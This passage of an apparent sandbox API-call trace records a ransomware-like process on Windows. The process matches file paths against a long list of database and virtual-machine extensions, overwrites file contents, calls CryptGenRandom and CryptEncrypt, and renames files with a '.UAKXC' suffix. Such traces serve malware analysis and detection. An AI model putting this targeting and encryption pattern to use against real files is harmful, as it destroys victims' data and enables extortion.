Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".tps") returned 0x0 [0147.878] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".trc") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".trm") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".udb") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".udl") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".usr") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".v12") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vis") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vpd") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vvv") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".wdb") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".wmdb") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".wrk") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".xdb") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".xld") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".xmlff") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".abcddb") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".abs") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".abx") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".accdw") returned 0x0 [0147.879] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".adn") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".db2") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".fm5") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".hjt") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".icg") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".icr") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".kdb") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".lut") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".maw") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mdn") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".mdt") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vdi") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vhd") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmdk") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".pvm") returned 0x0 [0147.880] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmem") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmsn") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmsd") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".nvram") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmx") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".raw") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".qcow2") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".subvol") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".bin") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vsv") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".avhd") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmrs") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vhdx") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".avdx") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".vmcx") returned 0x0 [0147.881] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".iso") returned 0x0 [0147.881] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.881] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.935] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.935] SetEndOfFile (hFile=0x714) returned 1 [0147.935] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.935] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x500000, lpOverlapped=0x0) returned 1 [0148.665] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.665] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x500000, lpOverlapped=0x0) returned 1 [0149.038] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x1b5d0a, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0149.123] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffe4a2f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.123] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x1b5d0a, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0149.247] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x6b5d0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.247] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x500000, lpOverlapped=0x0) returned 1 [0149.930] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.930] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x500000, lpOverlapped=0x0) returned 1 [0150.034] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x1b5d0a, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0150.302] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffe4a2f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.302] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x1b5d0a, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0150.474] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x6b5d0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.474] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x500000, lpOverlapped=0x0) returned 1 [0151.597] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.597] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x500000, lpOverlapped=0x0) returned 1 [0151.661] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x1b5d0a, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0153.844] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffe4a2f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.844] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x1b5d0a, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0154.176] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x6b5d0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.177] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x500000, lpOverlapped=0x0) returned 1 [0154.707] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0154.708] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x500000, lpOverlapped=0x0) returned 1 [0154.951] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x1b5d0a, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0155.145] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffe4a2f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.145] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x1b5d0a, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0155.153] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x6b5d0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0155.153] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x500000, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x500000, lpOverlapped=0x0) returned 1 [0156.774] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffb00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.774] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x500000, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x500000, lpOverlapped=0x0) returned 1 [0157.181] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x1b5d0a, lpNumberOfBytesRead=0x383fc80, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc80*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0157.547] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffe4a2f6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.547] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x1b5d0a, lpNumberOfBytesWritten=0x383fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc2c*=0x1b5d0a, lpOverlapped=0x0) returned 1 [0157.576] CloseHandle (hObject=0x714) returned 1 [0159.540] GetProcessHeap () returned 0xea0000 [0159.540] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77950d0 [0159.541] lstrcpyW (in: lpString1=0x77950d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0159.541] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.UAKXC" [0159.541] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.uakxc")) returned 1 [0159.543] GetProcessHeap () returned 0xea0000 [0159.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77950d0 | out: hHeap=0xea0000) returned 1 [0159.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1200 | out: hHeap=0xea0000) returned 1 [0159.543] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d08 | out: hHeap=0xea0000) returned 1 [0159.543] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0159.543] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0159.543] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0159.544] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0159.544] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0159.544] GetLastError () returned 0x0 [0159.544] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=1231) returned 1 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".4dd") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".4dl") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accdb") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accdc") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accde") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accdr") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accdt") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".accft") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".adb") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ade") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".adf") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".adp") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".arc") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ora") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".alf") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ask") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".btr") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".bdf") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".cat") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".cdb") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ckp") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".cma") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".cpd") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dacpac") returned 0x0 [0159.545] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dad") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dadiagrams") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".daschema") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".db") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".db-shm") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".db-wal") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".db3") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dbc") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dbf") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dbs") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dbt") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dbv") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dbx") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dcb") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dct") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dcx") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".ddl") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpSrch=".dlis") returned 0x0 [0159.546] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", 